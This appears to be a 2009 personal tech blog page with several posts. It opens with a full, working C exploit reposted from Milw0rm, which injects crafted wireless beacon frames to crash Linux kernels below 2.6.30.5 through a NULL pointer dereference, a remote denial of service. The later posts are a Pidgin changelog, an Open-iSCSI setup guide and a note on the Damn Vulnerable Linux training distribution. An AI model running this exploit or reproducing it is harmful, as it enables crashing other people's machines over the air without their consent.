Posted: August 18th, 2009 | Author: xanda | Filed under: IT Related | Tags: 2.6.30.5, exploit, kernel, linux, remote | No Comments »
In case you guys haven’t noticed this vulnerability yet:
/*
* cfg80211-remote-dos.c
*
* Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://patchwork.kernel.org/patch/41218/
*
* These pointers can be NULL, the is_mesh() case isn't ever hit in the
* current kernel, but cmp_ies() can be hit under certain conditions.
*
* Usage:
*
* $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
* $ airmon-ng start wlan0
* ...
* $ ./cfg80211-remote-dos mon0 mac80211
* [+] Initializing interface mon0...
* [+] Injecting crafted DoS beacon frames...
*
* Notes:
*
* The NULL pointer dereference is triggered if the victim scans and receives
* a beacon frame that does not contain a SSID IE and then receives another
* one that does have a SSID IE. Raw frame injection via LORCON is required
* on the wireless interface. This should only affect the 2.6.30 series.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <tx80211.h>
#include <tx80211_packet.h>
/*
 * Raw 802.11 beacon frame that carries no SSID information element (the
 * "first" frame described in the Notes above). Indices 15 and 21 -- the
 * last byte of the second and third 6-byte groups -- are overwritten with
 * a random value in main() before each transmission.
 */
#define BEACON_NOSSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
/* Byte length of BEACON_NOSSID, not counting the string terminator. */
#define BEACON_NOSSID_LEN 64
/*
 * The same frame with a 5-byte SSID element added; the
 * "\x00\x03\x44\x6f\x53" line is the only difference from BEACON_NOSSID.
 */
#define BEACON_SSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x00\x03\x44\x6f\x53" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
/* Byte length of BEACON_SSID (BEACON_NOSSID_LEN + 5). */
#define BEACON_SSID_LEN 69
/*
 * Print the command-line synopsis, followed by the driver names that the
 * LORCON card list reports.
 *
 * argv: the program's argument vector; argv[0] is printed as the program
 *       name. Output goes to stdout only; nothing is returned.
 */
void
usage(char **argv)
{
	struct tx80211_cardlist *cards = NULL;

	printf("Usage: %s [interface] [drivername]\n", argv[0]);

	cards = tx80211_getcardlist();
	if (cards != NULL) {
		int idx = 1;

		printf("\nSupported drivers are: ");
		/* Entry 0 is skipped, as in the original listing -- presumably
		 * a placeholder entry; verify against the LORCON headers. */
		while (idx < cards->num_cards) {
			printf("%s ", cards->cardnames[idx]);
			idx++;
		}
		printf("\n");
	} else {
		printf("Error accessing supported cardlist.\n");
	}

	/* Handed to the library even when NULL, exactly as before. */
	tx80211_freecardlist(cards);
}
/*
 * Entry point.
 *
 * argv[1] is the monitor interface, argv[2] the LORCON driver name. The
 * interface is put into injection/monitor mode on channel 11, then the two
 * beacon frames are transmitted alternately in an endless loop.
 *
 * Returns 0 after printing usage when fewer than two arguments are given;
 * every LORCON failure terminates the process with exit(1) without closing
 * the handle. The loop never ends on its own, so the tx80211_close() and
 * return 0 at the bottom are unreachable.
 */
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
/* Writable copies of the frame templates; one byte per frame is patched below. */
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
/* NOTE(review): this message lacks a trailing newline, unlike the others. */
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
/* Channel 11 is hard-coded; the frames are only sent there. */
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
/* rand() only varies one byte per frame below; no cryptographic quality is needed. */
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
/* Same low byte written to index 15 and 21 of both frames each iteration. */
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
/* Frame without the SSID element goes first ... */
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
/* ... then the one that carries it. */
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
/* Unreachable: the loop above only exits via exit(1). */
tx80211_close(&tx);
return 0;
}
Source: Milw0rm
Posted: June 24th, 2009 | Author: xanda | Filed under: IT Related | Tags: linux, pidgin, yahoo messenger | 2 Comments »
Download
[If you plan to compile it yourself, please refer HERE]
Change log:
- Yahoo Protocol 16 support, including new HTTPS login method; this should fix a number of login problems that have recently cropped up. (Sulabh Mahajan, Mike “Maiku” Ruprecht)
- Only display the AIM “Unable to Retrieve Buddy List” message once per connection. (Rob Taft)
- Blocking MSN users not on your buddy list no longer disconnects you.
- When performing operations on MSN, assume users are on the MSN/Passport network if we don’t get network ID’s for them.
Posted: April 28th, 2009 | Author: xanda | Filed under: IT Related | Tags: iSCSI, iSCSI Initiator, linux, ubuntu | No Comments »
This is not the first time I have dealt with a SAN device, but I had never used one with Ubuntu Linux before. Anyway, there is a first time for everything.
After 15 minutes of playing around with Open-iSCSI (it can be done in just a few seconds on Windows using the GUI-based iSCSI Initiator), here is the how-to (which also serves as a note for myself):
1) Install Open-iSCSI Initiator
sudo apt-get install open-iscsi
2) If you want your computer to connect to the SAN volume manually, proceed to step 3. But if you want your computer to connect to the volume automatically, edit the iscsid configuration file
sudo nano /etc/iscsi/iscsid.conf
And change the following parameters
- isns.address = SAN-IP-ADDRESS-HERE
- isns.port = 3260
3) If the restriction is based on IP (without a password), proceed to step 4. But if a password is required, edit the iscsid configuration file
sudo nano /etc/iscsi/iscsid.conf
And change/set the following parameters (since the file now holds the login credentials, make sure it is readable only by root)
- node.session.auth.username = USER
- node.session.auth.password = PASSWORD
- discovery.sendtargets.auth.username = USER
- discovery.sendtargets.auth.password = PASSWORD
4) Restart the open-iscsi service
sudo /etc/init.d/open-iscsi restart
5) Run open-iscsi administration utility with root privilege to discover available volume
sudo iscsiadm -m discovery -t sendtargets -p 192.168.10.1
where 192.168.10.1 is the IP of your SAN. If your configuration is working, you will get something similar to this :-
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-f260b4603-e8b0000001249f55-vss-control
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-6980b4603-a990000001f49f56-csmvol3
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-58c0b4603-1730000001c49f56-csmvol2
192.168.10.1:3260,1 iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1
6) In this case, I want to connect to volume 1 (iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1), so here is what I should do
sudo iscsiadm --mode node --targetname iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1 --portal 192.168.10.1:3260 --login
And if you are successfully connected, you’ll get the following message
Logging in to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]
Login to [iface: default, target: iqn.2001-05.com.equallogic:0-8a0906-4280b4603-a410000001949f56-csmvol1, portal: 192.168.10.1,3260]: successful
7) Now, verify the device name that has been connected to your machine
tail -f /var/log/messages
And in my case, this is my output
Apr 28 09:42:48 xps kernel: [ 2514.014658] scsi 6:0:0:0: Direct-Access EQLOGIC 100E-00 4.0 PQ: 0 ANSI: 5
Apr 28 09:42:48 xps kernel: [ 2514.016499] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.017832] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.018256] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019240] sd 6:0:0:0: [sdb] 209725440 512-byte hardware sectors: (107 GB/100 GiB)
Apr 28 09:42:48 xps kernel: [ 2514.019434] sd 6:0:0:0: [sdb] Write Protect is off
Apr 28 09:42:48 xps kernel: [ 2514.019836] sd 6:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
Apr 28 09:42:48 xps kernel: [ 2514.019842] sdb: sdb1
Apr 28 09:42:48 xps kernel: [ 2514.024882] sd 6:0:0:0: [sdb] Attached SCSI disk
Apr 28 09:42:48 xps kernel: [ 2514.026039] sd 6:0:0:0: Attached scsi generic sg2 type 0
The connected volume appears as sdb on my machine.
8) If the volume already contains a partition and is already formatted, you can mount it straight away; but if it does not have a partition and filesystem yet, you can use either fdisk or gparted to create the partition and format it 😉
Enjoy..!~
Demo for fdisk -l output
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x12961295
Device Boot Start End Blocks Id System
/dev/sda1 1 12 96358+ de Dell Utility
/dev/sda2 * 13 7661 61440592+ 7 HPFS/NTFS
/dev/sda3 7662 11396 30001387+ b W95 FAT32
/dev/sda4 11397 19457 64749982+ 5 Extended
/dev/sda5 11397 11520 995998+ 82 Linux swap / Solaris
/dev/sda6 11521 19457 63753921 83 Linux
Disk /dev/sdb: 107.3 GB, 107379425280 bytes
255 heads, 63 sectors/track, 13054 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00093e08
Device Boot Start End Blocks Id System
/dev/sdb1 1 13054 104856223+ 83 Linux
[Reference: Cyberciti & Ubuntu Forum]
Posted: March 10th, 2009 | Author: xanda | Filed under: IT Related | Tags: linux, secure, security, vulnerable | No Comments »
Damn Vulnerable Linux (DVL) is a Slackware- and Slax-based live DVD purposely stuffed with broken, ill-configured, outdated and exploitable software. It began life as a training system used during the author’s university lectures.
Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.
It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.
So if you are looking for a new playground, DVL is a good choice for you.